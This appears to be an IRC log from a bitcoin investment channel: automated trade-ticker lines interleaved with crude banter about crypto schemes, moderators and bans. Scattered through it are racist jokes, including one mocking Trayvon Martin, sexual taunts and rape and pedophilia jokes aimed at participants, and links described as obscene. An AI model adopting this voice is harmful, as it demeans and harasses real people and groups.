[+] Jul 19 11:07:12 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 11:07:41 [BTCTC] [AMC-PT] 920 @ 0.0025 = 2.3 BTC [+] Jul 19 11:09:09 [BTCTC] [AMC-PT] 60 @ 0.0025 = 0.15 BTC [+] Jul 19 11:12:51 [BTCTC] [AMC-PT] 1625 @ 0.0025 = 4.0625 BTC [+] Jul 19 11:14:48 [BTCTC] [ASICMINER-PT] 1 @ 4.601035 BTC [-] Jul 19 11:15:27 [BTCTC] [AMC-PT] 650 @ 0.0025 = 1.625 BTC [+] Jul 19 11:18:08 woah hold on Jul 19 11:18:23 SD was sold? Jul 19 11:18:34 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [+] Jul 19 11:19:07 [HAVELOCK] [SMG] 100 @ 0.000362 = 0.0362 BTC [+] Jul 19 11:21:39 It's been a while since I've been here... Jul 19 11:22:53 So I won this bet: http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ Jul 19 11:23:22 For the lulz I spent the proceeds on buttcoins http://i.imgur.com/qDs5Nrj.jpg%5B/IMG%5D http://i.imgur.com/o08heoV.jpg%5B/IMG%5D Jul 19 11:25:36 lol Jul 19 11:25:42 man Jul 19 11:25:44 lol Diablo-D3 Jul 19 11:25:46 gmaxwell is shilling for BFL again Jul 19 11:26:18 Fuck gmaxwell, sans lube... Jul 19 11:27:01 seriously, all I ask for proof that they've met their several thousand unit obligation Jul 19 11:27:29 they've shipped, what, one dozen? two dozen? Jul 19 11:29:17 usagi try this guy, can't do worse than you usually do: http://i.imgur.com/o08heoV.jpg%5B/IMG%5D Jul 19 11:29:40 usagi: yes Jul 19 11:29:50 [BTCTC] [AMC-PT] 35 @ 0.0025 = 0.0875 BTC [+] Jul 19 11:30:09 usagi: order from someone reselling asicminer Jul 19 11:31:16 dunno. Jul 19 11:32:07 usagi: Surprisingly not me. From coinchat, speading my S.DICE is dead wealth from here: http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ Because I am the badman and usagi sucks. Jul 19 11:32:53 [BTCTC] [GSDPT] 2039 @ 0.003419 = 6.9713 BTC [+] Jul 19 11:32:55 [BTCTC] [GSDPT] 2893 @ 0.00342 = 9.8941 BTC [+] Jul 19 11:32:56 [BTCTC] [GSDPT] 5500 @ 0.003425 = 18.8375 BTC [+] Jul 19 11:32:58 [BTCTC] [GSDPT] 149 @ 0.00343 = 0.5111 BTC [+] Jul 19 11:32:59 [BTCTC] [GSDPT] 43 @ 0.003439 = 0.1479 BTC [+] Jul 19 11:33:00 [BTCTC] [GSDPT] 20 @ 0.003448 = 0.069 BTC [+] Jul 19 11:33:02 [BTCTC] [GSDPT] 97 @ 0.00345 = 0.3347 BTC [+] Jul 19 11:33:30 usagi yes.I am the bad man. Jul 19 11:34:01 [BTCTC] [AMC-PT] 4400 @ 0.0025 = 11 BTC [+] Jul 19 11:34:30 [BTCTC] [GSDPT] 1 @ 0.0305 BTC [+] Jul 19 11:34:36 Somehow I still get better returns for my sole investor (me) than you do for the schlubs you drag down with you you damn schlemiel. Jul 19 11:36:33 usagi: No you don't owe me shit. I just find you funny. It would be a complement if this was the disney channel and not bitcoin. Jul 19 11:36:49 Crap, I thought this was the disney channel Jul 19 11:37:16 [BTCTC] [AMC-PT] 3000 @ 0.0025 = 7.5 BTC [+] Jul 19 11:37:25 Goat, bitch please. I'm Basically beyonce. Jul 19 11:38:40 usagi: for what, a buttcoin? Jul 19 11:39:08 Do I need to post my #faveflave address??? Jul 19 11:39:31 [BTCTC] [ASICMINER-PT] 1 @ 4.602001 BTC [+] Jul 19 11:40:01 usagi: 1LvCuntsJyFFQsLuJhBXBPokbQa7SAyMr4 Maybe my address, maybe not my address, maybe I'm a nick squatter Jul 19 11:40:51 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [+] Jul 19 11:41:07 [BTCTC] [AMC-PT] 4400 @ 0.0025 = 11 BTC [+] Jul 19 11:41:23 I've been here before. This name has been here before. I can's say for sure I was here as this name before... Jul 19 11:41:24 [BTCTC] [AMC-PT] 1680 @ 0.0025 = 4.2 BTC [+] Jul 19 11:41:53 Asshole forgot to nickserve. Jul 19 11:42:00 [BTCTC] [AMC-PT] 39 @ 0.0025 = 0.0975 BTC [+] Jul 19 11:42:39 [BTCTC] [BTC-BOND] 10 @ 0.009996 = 0.1 BTC [+] Jul 19 11:43:21 [BTCTC] [AMC-PT] 503 @ 0.0025 = 1.2575 BTC [+] Jul 19 11:43:41 Hello. Jul 19 11:44:08 looks like mircea_popescu isn't aren't chatting. Jul 19 11:44:33 I'll have to wait for my withdrawal and payout the PT holders on BTCT.co Jul 19 11:45:00 I'll probably have that done tomorrow. Jul 19 11:45:14 So within the next 12 hours if withdrawal was processed. Jul 19 11:45:35 Namworld: It happens to the best of us, but it happens to the worst of us first: http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ Jul 19 11:46:36 usagi: where can I invest .1 bitcoin and get 10 in return in the span of five days? Jul 19 11:46:46 lol. Jul 19 11:47:02 hi everyone! Hi BingoBoingo Jul 19 11:47:14 [HAVELOCK] [SMG] 100 @ 0.000362 = 0.0362 BTC [+] Jul 19 11:47:21 californiablue: Hello, welcome to IRC Jul 19 11:47:26 ;; Jul 19 11:47:58 [BTCTC] [LTC-ATF.B2] 1 @ 0.01001 BTC [-] Jul 19 11:48:02 Serious question =( Jul 19 11:48:46 [BTCTC] [LTC-ATF.B2] 1 @ 0.01001 BTC [-] Jul 19 11:49:14 [HAVELOCK] [SMG] 525 @ 0.000362 = 0.1901 BTC [+] Jul 19 11:49:25 usagi: Maybe... What is it worth to you.. For either speculation or the real answer... Jul 19 11:49:38 usagi: satoshi did it, isn't it obvious? Jul 19 11:49:39 [HAVELOCK] [SMG] 2500 @ 0.000375 = 0.9375 BTC [+] Jul 19 11:49:57 usagi: I have a feeling the price for that information is too rich for your blood Jul 19 11:50:06 [HAVELOCK] [SMG] 2500 @ 0.000388 = 0.97 BTC [+] Jul 19 11:50:35 What is the most you have in an address you can sign a message with Usagi? Jul 19 11:50:35 [BTCTC] [ASICMINER-PT] 1 @ 4.61 BTC [+] Jul 19 11:50:47 I'm skinny, I need to enrich my blood, make it fat. Jul 19 11:51:08 [BTCTC] [DMS.SELLING] 10 @ 0.023529 = 0.2353 BTC [+] Jul 19 11:51:11 [BTCTC] [DMS.SELLING] 50 @ 0.02251 = 1.1255 BTC [-] Jul 19 11:51:12 [BTCTC] [DMS.SELLING] 300 @ 0.0225 = 6.75 BTC [-] Jul 19 11:51:13 [BTCTC] [DMS.SELLING] 11 @ 0.0225 = 0.2475 BTC [-] Jul 19 11:51:14 [BTCTC] [DMS.SELLING] 39 @ 0.0222 = 0.8658 BTC [-] Jul 19 11:51:16 [BTCTC] [DMS.SELLING] 27 @ 0.022022 = 0.5946 BTC [-] Jul 19 11:51:17 [BTCTC] [DMS.SELLING] 25 @ 0.022022 = 0.5506 BTC [-] Jul 19 11:51:19 [BTCTC] [DMS.SELLING] 38 @ 0.022 = 0.836 BTC [-] Jul 19 11:51:38 A signature with how much money do you require, BingoBoingo? Jul 19 11:52:08 [BTCTC] [LTC-ATF.B2] 1 @ 0.01001 BTC [-] Jul 19 11:52:13 i see a uptrend 1-2 days Jul 19 11:53:05 usagi: Sounds like you need to conolidate funds like I like mudkips. Your tx fees must be through the roof. Jul 19 11:53:30 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 19 11:53:43 dude, dont display your ass around here..save that for #gayboy or something Jul 19 11:53:50 Usagi probably has more stuck in exchanges. Not sure he has that much. But more than bitcents for sure. Jul 19 11:53:52 @bingoboingo Jul 19 11:54:00 [BTCTC] [LTC-ATF.B2] 7 @ 0.01001 = 0.0701 BTC [-] Jul 19 11:54:02 [BTCTC] [LTC-ATF.B2] 1 @ 0.010002 BTC [-] Jul 19 11:54:04 [BTCTC] [LTC-ATF.B2] 220 @ 0.010001 = 2.2002 BTC [-] Jul 19 11:54:52 heh Jul 19 11:55:21 [BTCTC] [B.YABMC] 1 @ 0.002504 BTC [-] Jul 19 11:55:47 usagi: so why is it DMC has been more profitable than anything you've ever done? =/ Jul 19 11:56:19 [BTCTC] [AMC-PT] 1070 @ 0.0025 = 2.675 BTC [+] Jul 19 11:56:21 uh-huh. Jul 19 11:56:43 [BTCTC] [AMC-PT] 922 @ 0.0025 = 2.305 BTC [+] Jul 19 11:56:56 btw, did you notice DMC has crossed the outer threshold of profitability? Jul 19 11:57:18 wheres dub so he can bitch about how DMC isnt 1BTC yet Jul 19 11:57:27 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 19 11:58:26 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 19 11:58:31 I made a bigger screw-up than you guys without anyone complaining about it. Where are my trolls? Jul 19 11:58:59 Namworld: I dont know :< Jul 19 11:59:18 Namworld: Your problem is you wipe with sufficient paper to keep the skids out your undies. Jul 19 11:59:34 BingoBoingo speaks from experience Jul 19 11:59:38 Oh, I see. It's important to stay clean. Jul 19 11:59:57 usagi: but yes, DMC will go private for a short time Jul 19 12:00:04 I wish Gigavps had taken the offer instead of amazingrando. Jul 19 12:00:14 Namworld: yeah me too =/ Jul 19 12:00:22 usagi: Why can't I see my BMF shares if they are being traded? Jul 19 12:00:24 that was probably the biggest loss DMC suffered Jul 19 12:01:14 Diablo-D3: Of course. We were all five once, except maybe usagi. Jul 19 12:02:29 usagi: so, you still dressing up as a japanese princess? Jul 19 12:03:30 Namworld: so how badly did giga fuck his investors, anyhow Jul 19 12:03:34 usagi: Guessing from your avatars I though you though you were half that age. Jul 19 12:05:16 Diablo-D3: I'm guessing it isn't dress up mean it is real life. All those poor Nyan investors trusted a bonafide disney princess. Jul 19 12:06:23 Diablo-D3, the thing is, Gigavps pays the 5 mhash/s guaranteed. Jul 19 12:06:42 Just I find the upgrade offered was a bad deal. Jul 19 12:06:45 Namworld: yeah, but did the teramining upgrade ever happen as paid for? Jul 19 12:07:02 or is he crying BOO HOO HOO BFL NEVER SHIPPED, THERE WENT ALL OUR MONEY Jul 19 12:07:13 But now with BFL not shipping and all the ASICs already deployed, he won't rake in the good days of high profits. Jul 19 12:07:59 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 12:08:03 yeah really, he really backed the wrong horse on that one Jul 19 12:08:04 [BTCTC] [BTC-BOND] 33 @ 0.009996 = 0.3299 BTC [+] Jul 19 12:08:23 Diablo-D3: Did giga ever have real investors? I though Giga just had victims... Jul 19 12:08:34 BingoBoingo: same difference Jul 19 12:08:42 it was way overpriced for DMC to buy into Jul 19 12:09:45 Eh, anyone who started mining after september 2009 might as wel have been Trayvon buying lottery tickets to go with his skittles anyways... Jul 19 12:10:40 [BTCTC] [AMC-PT] 34 @ 0.0025 = 0.085 BTC [+] Jul 19 12:12:30 [HAVELOCK] [SDSTM] 10 @ 0.010999 = 0.11 BTC [+] Jul 19 12:12:56 ;;ticker Jul 19 12:12:56 MtGox BTCUSD ticker | Best bid: 89.35175, Best ask: 89.49000, Bid-ask spread: 0.13825, Last trade: 89.31000, 24 hour volume: 27939.37642155, 24 hour low: 86.20000, 24 hour high: 92.79990, 24 hour vwap: 89.14723 Jul 19 12:13:00 SDSTM.. srsly? Jul 19 12:14:14 TradeFortress: Better than NYAN.C explicitly investing in Pirate... Jul 19 12:14:23 lol tradefortress Jul 19 12:14:25 where you been Jul 19 12:15:10 in other channels :P Jul 19 12:15:25 I irc on another computer now. I'll add bitcoin-assets back to my join list Jul 19 12:17:15 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 12:17:20 TradeFortress: So much better than otc Jul 19 12:17:37 [HAVELOCK] [SDSTM] 19 @ 0.011 = 0.209 BTC [+] Jul 19 12:17:51 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [+] Jul 19 12:17:57 [BTCTC] [ASICMINER-PT] 1 @ 4.697844 BTC [+] Jul 19 12:17:59 [BTCTC] [ASICMINER-PT] 3 @ 4.69797 = 14.0939 BTC [+] Jul 19 12:18:01 [BTCTC] [ASICMINER-PT] 1 @ 4.698 BTC [+] Jul 19 12:18:03 [BTCTC] [ASICMINER-PT] 1 @ 4.699 BTC [+] Jul 19 12:18:04 you missed the sandstorm fun Jul 19 12:18:08 Heh Jul 19 12:18:10 x10 x20 profits Jul 19 12:18:12 [HAVELOCK] [AM100] 20 @ 0.04547499 = 0.9095 BTC [-] Jul 19 12:18:52 [HAVELOCK] [SDSTM] 20 @ 0.0112 = 0.224 BTC [+] Jul 19 12:20:02 First buttcoin I bought with S.DICE is uninvestable proceeds -> http://i.imgur.com/qDs5Nrj.jpg%5B/IMG%5D Jul 19 12:20:36 Second, but really it is a power and not a sex thing right??? -> http://i.imgur.com/o08heoV.jpg%5B/IMG%5D Jul 19 12:20:38 [BTCTC] [AMC-PT] 3350 @ 0.0025 = 8.375 BTC [+] Jul 19 12:20:40 [HAVELOCK] [SMG] 10 @ 0.000395 = 0.004 BTC [+] Jul 19 12:20:50 Fuck, I got unlogged from Havelock just before the SDSTM IPO Jul 19 12:20:59 I dislike autologin features. Jul 19 12:21:01 [BTCTC] [AMC-PT] 96 @ 0.0025 = 0.24 BTC [+] Jul 19 12:21:12 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 19 12:21:40 you couuld always invest into sandstorm 2.0 Jul 19 12:21:48 the golden rocketship Jul 19 12:21:50 [BTCTC] [AMC-PT] 3880 @ 0.0025 = 9.7 BTC [+] Jul 19 12:23:23 No, I'll make a bitcoin fund, each share worth 1 BTC held securely on a Commodore 64 atop TNT atop a pool of petroleum. With lanterns all around. Jul 19 12:23:47 [BTCTC] [AMC-PT] 650 @ 0.0025 = 1.625 BTC [+] Jul 19 12:23:47 Check people fight to death to buy each share at 2 BTC a piece. Jul 19 12:24:23 Sometimes I think people on Havelock don't read at all. Jul 19 12:24:39 Actually that's the case for all exchanges, but especially on Havelock. Jul 19 12:26:11 no wonder with that headlines font Jul 19 12:26:20 makes my eyes bleed Jul 19 12:26:29 It seems the average person strictly look at share price and dividends. Not forum threads, not contracts, not what's happening, not what's planned, not the issuer, not what the business is about. Jul 19 12:26:52 Namworld: The best part is you will always have to pay only half the interest Deprived does because he is new and dirty. Jul 19 12:27:22 lol Jul 19 12:27:26 Zero investigation, zero questioning. Not reviewing the price on their buy/sell orders before they submit. Jul 19 12:27:59 namworld if you do Jul 19 12:28:09 i want some pre pre ipo shares Jul 19 12:28:09 What? You mean BTC-BOND? Deprived is doing fine too. Jul 19 12:28:41 Sorry VanCleef, can't issue something that silly. Jul 19 12:29:20 the sandstorm situation is will make such a great study oneday Jul 19 12:31:15 It's still trading at 1000 BTC market cap implied when the issuer IPOed and got 100 BTC to buy assets for his fund. Jul 19 12:31:51 Hmm Jul 19 12:32:03 The underlying business matters not it seem for BTC investors. Beside, even the serious ones are more like speculators, not investors. Jul 19 12:32:11 I'd call those gamblers. Jul 19 12:32:41 ya its classic Jul 19 12:32:44 The more time goes by, the more I wonder what the heck is going on. Jul 19 12:33:10 Namworld, saw the guy that was buying options on btct.co for SDICE at 0.03 a share (not 0.003)? Jul 19 12:33:27 I heard of that from the S.DICE thread. Jul 19 12:33:40 I went to check, was like, wtf? Jul 19 12:34:01 usagi: If I gave you ten bitcoin, what would you do with it? Jul 19 12:34:04 YARGH!!!!! Jul 19 12:34:32 [HAVELOCK] [AM1] 7 @ 4.6 = 32.2 BTC [+] Jul 19 12:35:12 Namworld: Are you explicitly condinign Usagu revive Nyan.WTF??? Jul 19 12:35:12 lol pirate Jul 19 12:35:13 If you don't know how to invest, at least check your decimals twice, see if the order of magnitude is correct on those satoshis. That anyone should be able to do. Jul 19 12:35:14 I see you there californiablue me hearty! Jul 19 12:35:43 Good morning Trade Fortress! Yo ho ho and pirate stuff! Jul 19 12:35:47 pirate: some guy told me to come here and give usagi money, did you come to do that too? Jul 19 12:35:53 he said something funny would happen Jul 19 12:36:06 "Ahoy thar pirate!! Jul 19 12:36:17 i dunno nopeman. Usagi aint gettin my booty Jul 19 12:36:24 He's reviving it or something? Jul 19 12:38:24 **crickets** Jul 19 12:39:12 I like crickets Jul 19 12:39:36 crickets are yummy. Anyone here sell them for bitcoin? Jul 19 12:39:56 *passes chipug some grog* Jul 19 12:39:56 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 12:40:32 [BTCTC] [B.YABMC] 1 @ 0.002982 BTC [+] Jul 19 12:40:54 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 12:41:01 ;; Jul 19 12:41:11 :) Jul 19 12:41:22 =^.^= Jul 19 12:41:22 uh... just occured to me pirate would be one of the first nick registered in the batch of generic names. Where you around on freenode before BTC came around? Jul 19 12:41:43 generic stuff like that =/ Jul 19 12:41:50 Namworld: probably in the deep dark BDSM areas Jul 19 12:42:08 idm? Jul 19 12:42:26 heh Jul 19 12:42:35 anywhere there are whips, chains, and leather you will find me Jul 19 12:42:44 er Jul 19 12:42:48 lets try that again Jul 19 12:42:49 i knew that response was coming lol Jul 19 12:43:10 going from erlang to english isnt a great transition Jul 19 12:43:13 pirate: The BDSM areas are actually the clean ones here. Mircea keeps it so. Jul 19 12:43:32 [HAVELOCK] [SMG] 2490 @ 0.000395 = 0.9836 BTC [+] Jul 19 12:43:35 lol usagi is trying to cash in on the end of bitcoin Jul 19 12:43:40 i'm looking to invest in pirateat40, i was told usagi could give me a few pointers Jul 19 12:44:05 fuckin LOL Diablo and just for the record I hate p@40 Jul 19 12:44:17 nopeman: you need a time machine... i'm not aware usagi has one Jul 19 12:44:18 I dont even care about piraat Jul 19 12:44:26 jurov, nah, you can still invest in pirate debt Jul 19 12:44:27 its just a bump in the road for bitcoin Jul 19 12:44:34 jurov: pirate said he had a time machine Jul 19 12:44:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.0449 = 0.0898 BTC [-] Jul 19 12:44:38 I'll sell some to you for 10% and I'll even pay you a week of 7% interest. Jul 19 12:44:44 hey guys Jul 19 12:44:54 whatever happened to that black guy that was harassing me and others Jul 19 12:45:02 TradeFortress sounds legit Jul 19 12:45:10 usagi: yeah him Jul 19 12:45:32 I dont know Jul 19 12:45:33 [BTCTC] [AMC-PT] 48 @ 0.0025 = 0.12 BTC [+] Jul 19 12:45:40 [BTCTC] [AMC-PT] 5500 @ 0.0025 = 13.75 BTC [+] Jul 19 12:45:41 it was good drama generator :< Jul 19 12:46:04 *brandishes his scimitar and passes grog out to all* Jul 19 12:46:06 [HAVELOCK] [VTX] 1 @ 0.70999998 BTC [-] Jul 19 12:46:36 [BTCTC] [AMC-PT] 109 @ 0.0025 = 0.2725 BTC [+] Jul 19 12:46:37 So what's a digital pirate like you doing around BTC? Coming to loot all the virtual gold? Sorry but another pirate already robbed everyone clean. Jul 19 12:46:46 [HAVELOCK] [SMG] 100 @ 0.0004 = 0.04 BTC [+] Jul 19 12:46:51 even in piracy, the dutch did it first Jul 19 12:46:51 So where those profits at because: 1LvCuntsJyFFQsLuJhBXBPokbQa7SAyMr4 and tomorrow is amateur night at the crystal palace? Jul 19 12:46:54 [HAVELOCK] [SMG] 100 @ 0.0004 = 0.04 BTC [+] Jul 19 12:47:06 [HAVELOCK] [SMG] 100 @ 0.0004 = 0.04 BTC [+] Jul 19 12:47:08 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 19 12:47:12 nah Namworld in fact I usually wind up gifting all my booty anyway Jul 19 12:47:17 [HAVELOCK] [SMG] 300 @ 0.0004 = 0.12 BTC [+] Jul 19 12:48:24 I just realized something Jul 19 12:48:40 usagi: If you didn't pretend to be a five year old maybe you could say fuck off instead of eww Jul 19 12:48:42 so, Im not a bitcointalk mod anymore Jul 19 12:48:50 less than zero fucks were given Jul 19 12:48:59 seriously, I may have reached the holy grail of negative fucks given. Jul 19 12:49:24 yes, hes a 28 year old japanese guy Jul 19 12:49:33 with suspiciously feminine hips Jul 19 12:49:50 i misread it as unagi firstly sorry lol thought was someone else Jul 19 12:49:51 JAPAN! Jul 19 12:50:10 Where things can be anything, weird, not what they seem, etc! Jul 19 12:50:20 A true place of mistery and wonder. Jul 19 12:50:30 Lots of weird shit comes outta Japan. It's expected Jul 19 12:50:38 meh Jul 19 12:50:42 Ive seen all of japan's weird shit Jul 19 12:50:44 its kinda boring Jul 19 12:50:48 Japan IS weird shit. Jul 19 12:50:53 Not boring by any stretch. Jul 19 12:50:56 Yargh matey! Jul 19 12:50:57 like, how many hentais do schoolgirls get raped by tentacle monsters. Jul 19 12:51:03 Come on every one knos Usagi is a 48 year old master of the Canadian Bear scene who turns into a 3 year old when you put a twink collar on him. Jul 19 12:51:19 BingoBoingo: they make twink collars that big? Jul 19 12:51:28 *scans the user list for pedo bear* Jul 19 12:51:45 pirate: the issue is moot anyways Jul 19 12:51:49 (dohohohohohoho) Jul 19 12:51:52 If I had to visit, would probably be for the food. It's always for the food. I love food. Jul 19 12:51:54 AHOY MATEY Jul 19 12:52:07 Diablo-D3: Yeah, not all the skinny boys can put their finger down their throat often enough to stay pretty. Jul 19 12:52:22 BingoBoingo: Says who? Jul 19 12:52:27 Fuck Disney World. Jul 19 12:52:29 *names wildcat his firstmate, provides him with a scimitar, pegleg, and grog* Jul 19 12:52:29 usagi: Because that doesn't sound creepy at all. Jul 19 12:52:32 That place is where dreams go to die. Jul 19 12:52:44 Hi there? Jul 19 12:52:50 Do you like fishsticks Wildcat? Jul 19 12:52:54 I went to Disney World & saw Mickey Mouse punch a kid in the face. Jul 19 12:53:00 I'm not even lying. Jul 19 12:53:04 Fuck Disney World. Jul 19 12:53:19 their disney world is WEIRD Jul 19 12:53:34 I always wanted to go to disneyworld and get it on with Snow white or some other Disney Princess Jul 19 12:53:35 Supa: I like fish dicks Jul 19 12:53:35 ;P Jul 19 12:53:40 usually the culture of the country doesnt infiltrate into disney properties Jul 19 12:53:44 It's a coup. Jul 19 12:53:44 it did here Jul 19 12:53:57 Not a coup A MUTINY! YARGH Jul 19 12:53:58 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [-] Jul 19 12:54:12 Ill drink to that shit Jul 19 12:54:35 you'll drink to anything Jul 19 12:54:41 explains why the rum is always gone Jul 19 12:54:44 Why wouldn't you want to drink to anything? Jul 19 12:54:49 a pirate and a princess. id like to see that Jul 19 12:55:09 Only if I get to be the princess. Jul 19 12:55:12 Hardie har har. Jul 19 12:55:26 >pirate and a princess Jul 19 12:55:29 you have to be! Jul 19 12:55:46 Promise to do my hair on my big day? Jul 19 12:55:55 Shave the cat :O Jul 19 12:56:02 wildcat you know what this chat needs/ Some DNatureofDTrain ..... Jul 19 12:56:08 No Jul 19 12:56:10 Fuck no. Jul 19 12:56:12 IRC question: what's with /whois [user] [user] syntax to see their idle time. Jul 19 12:56:12 Never. Jul 19 12:56:27 why the fuck do I suddenly want to watch the princess bride Jul 19 12:56:28 I like my crazy, I don't like my batshit. Jul 19 12:56:39 Diablo-D3: Something tells me your closet told you too. Jul 19 12:56:45 [BTCTC] [COGNITIVE] 1 @ 0.720001 BTC [-] Jul 19 12:56:47 [BTCTC] [COGNITIVE] 1 @ 0.72 BTC [-] Jul 19 12:56:51 i will do yo hair, make you pretty for yo big day chica Jul 19 12:56:52 hey Diablo can you unban my ip Jul 19 12:56:56 I won't troll Jul 19 12:56:56 I like having He/She in my arsenal Jul 19 12:56:59 Diablo-D3: Maybe you have a thing for the dread pirate Roberts, in my pants... Jul 19 12:57:02 I'm done with that Jul 19 12:57:03 Supa: I was a mod AND Im no longer a mod Jul 19 12:57:10 I corrected all the ratings and such Jul 19 12:57:17 Supa: mods cannot unban Jul 19 12:57:18 pirate: I'm still unable to figure out which one he/she really is too lol. Jul 19 12:57:21 ohh Jul 19 12:57:23 damn Jul 19 12:57:36 Supa, email theymos. Jul 19 12:57:40 All I know is that I was asked to quit trolling the he/she, so I must do as I'm told. Jul 19 12:57:41 supa why in the first place? Jul 19 12:57:42 LOL! Jul 19 12:57:44 Wildcat I am not sure I want to know Jul 19 12:57:56 pirate: You know you want a peek. Jul 19 12:57:59 sorry I have to get up off the floor lolol Jul 19 12:58:12 I bet it smells like ground beef & looks like smashed chicken. Jul 19 12:58:29 was laughing too hard on it xD Jul 19 12:58:35 Seriously I bought this: http://i.imgur.com/o08heoV.jpg%5B/IMG%5D I'm not mircea_popescu now, but in 2019 baby I'll have bought all the buttcoins Jul 19 12:58:46 Wildcat no shit ... I was asked to talk to you and find out why you hated trains so much. True story Jul 19 12:58:58 you probably do not want to click on BingoBoingo's lin. Jul 19 12:59:08 People make me so sad sometimes. Idiocy just runs rampant. Jul 19 12:59:20 Bingo you are a fucking douchenozzle. Jul 19 12:59:20 who asked you pirate? Jul 19 12:59:30 BingoBongo Can u believe he actually did that? Jul 19 12:59:34 chipug_: I'm assuming Da Train Jul 19 12:59:39 chipug DNature did Jul 19 12:59:51 The things some people will do for BTC Jul 19 12:59:54 I swear man. Jul 19 13:00:05 what was link? Jul 19 13:00:23 wildcat that girl is beyond hypnotizing Jul 19 13:00:24 [BTCTC] [AMC-PT] 1900 @ 0.0025 = 4.75 BTC [+] Jul 19 13:00:39 [HAVELOCK] [HIM] 1 @ 0.269 BTC [-] Jul 19 13:01:14 [HAVELOCK] [AM100] 110 @ 0.044062 = 4.8468 BTC [-] Jul 19 13:01:14 chipug_: Don't even bother asking. Jul 19 13:01:21 Sharpie. Bumbum. I won't say more. Jul 19 13:01:27 pirate: Which girl? Jul 19 13:01:31 [HAVELOCK] [AM100] 22 @ 0.044062 = 0.9694 BTC [-] Jul 19 13:01:36 The Kandycane? Jul 19 13:01:41 Supa removed all the ratings? Jul 19 13:01:45 BingoBongo I bet I can get Kandy to make him do all kind of weird shit if u have deep pockets lol Jul 19 13:01:46 [HAVELOCK] [AM100] 1 @ 0.044062 BTC [-] Jul 19 13:01:56 [HAVELOCK] [AM100] 73 @ 0.044062 = 3.2165 BTC [-] Jul 19 13:01:59 [HAVELOCK] [AM100] 26 @ 0.044062 = 1.1456 BTC [-] Jul 19 13:02:00 Wildcat_: I am not a douchenozzel. I though t I made it clear I am a buttpirate. Jul 19 13:02:02 Namworld, yeah Jul 19 13:02:08 Funny supa Jul 19 13:02:09 [HAVELOCK] [AM100] 55 @ 0.044063 = 2.4235 BTC [+] Jul 19 13:02:18 drinks to buttpirates Jul 19 13:02:25 He's back from the grave I see. Jul 19 13:02:36 BingoBoingo: That could be said as well. Jul 19 13:02:37 [HAVELOCK] [AM100] 45 @ 0.044062 = 1.9828 BTC [-] Jul 19 13:02:46 [HAVELOCK] [AM100] 1 @ 0.044062 BTC [-] Jul 19 13:02:50 chipug_: http://i.imgur.com/qDs5Nrj.jpg%5B/IMG%5D The girl is the one guiding the sharpie in the pooper. Jul 19 13:02:55 how are you namworld? Jul 19 13:02:55 [HAVELOCK] [AM100] 42 @ 0.044062 = 1.8506 BTC [-] Jul 19 13:03:11 Supa, make an alt and do it for the forum trust system Jul 19 13:03:14 Jesus christ. Jul 19 13:03:16 I hate you BingoBoingo Jul 19 13:03:17 lol imgur is blocked for me...im guessing i should be grateful?! Jul 19 13:03:24 chipug_: Be very grateful. Jul 19 13:03:31 seriously? Jul 19 13:03:37 TradeFortress I must say I leave one positive comment for you on bitcointalk and get 40 emails in 30 minutes lelelel Jul 19 13:03:48 pirate, 40 emails in 30 minutes? Jul 19 13:03:50 that would be hilarious Jul 19 13:04:02 TradeFortress stop banning all my alts on coinchat Jul 19 13:04:04 and I will Jul 19 13:04:13 Supa, no, I nuke your alts on sight. Jul 19 13:04:21 lol Jul 19 13:04:28 TradeFortress: it was actually 20 really and I wont disclose names here Jul 19 13:04:43 [BTCTC] [AMC-PT] 252 @ 0.0025 = 0.63 BTC [+] Jul 19 13:04:56 i take it its a common thing to get PMs from folk you dont know on btc talk? Jul 19 13:04:56 Supa: Quit being a tool son. Jul 19 13:04:58 [HAVELOCK] [AM100] 30 @ 0.044062 = 1.3219 BTC [-] Jul 19 13:05:01 Pirate, emails for? Jul 19 13:05:19 what? Jul 19 13:05:21 i'm not Jul 19 13:05:21 [HAVELOCK] [AM100] 2 @ 0.044063 = 0.0881 BTC [+] Jul 19 13:05:24 [BTCTC] [DMS.PURCHASE] 1 @ 0.039505 BTC [-] Jul 19 13:06:26 [HAVELOCK] [AM100] 7 @ 0.044065 = 0.3085 BTC [+] Jul 19 13:06:33 [HAVELOCK] [AM1] 10 @ 4.62 = 46.2 BTC [+] Jul 19 13:07:01 [MPEX] [S.MPOE] 10743 @ 0.00088983 = 9.5594 BTC [-] Jul 19 13:07:06 [HAVELOCK] [AM100] 10 @ 0.044062 = 0.4406 BTC [-] Jul 19 13:07:08 [HAVELOCK] [AM100] 1 @ 0.04406101 BTC [-] Jul 19 13:07:11 [HAVELOCK] [AM100] 25 @ 0.044 = 1.1 BTC [-] Jul 19 13:07:13 [HAVELOCK] [AM100] 354 @ 0.044 = 15.576 BTC [-] Jul 19 13:07:15 also, btw if you get any unsolicited PMs about me click [Report to admin] and get another of the phisher's accounts banned. Jul 19 13:07:15 [HAVELOCK] [AM100] 4 @ 0.044 = 0.176 BTC [-] Jul 19 13:07:17 [HAVELOCK] [AM100] 6 @ 0.044 = 0.264 BTC [-] Jul 19 13:08:21 go ahead Jul 19 13:08:46 [BTCTC] [BFMINES] 2 @ 0.003999 = 0.008 BTC [+] Jul 19 13:09:15 was peanuts really an alt? Jul 19 13:09:18 BingoBoingo, he does stuff. he just has a very laid back way of doing it. Jul 19 13:09:26 [HAVELOCK] 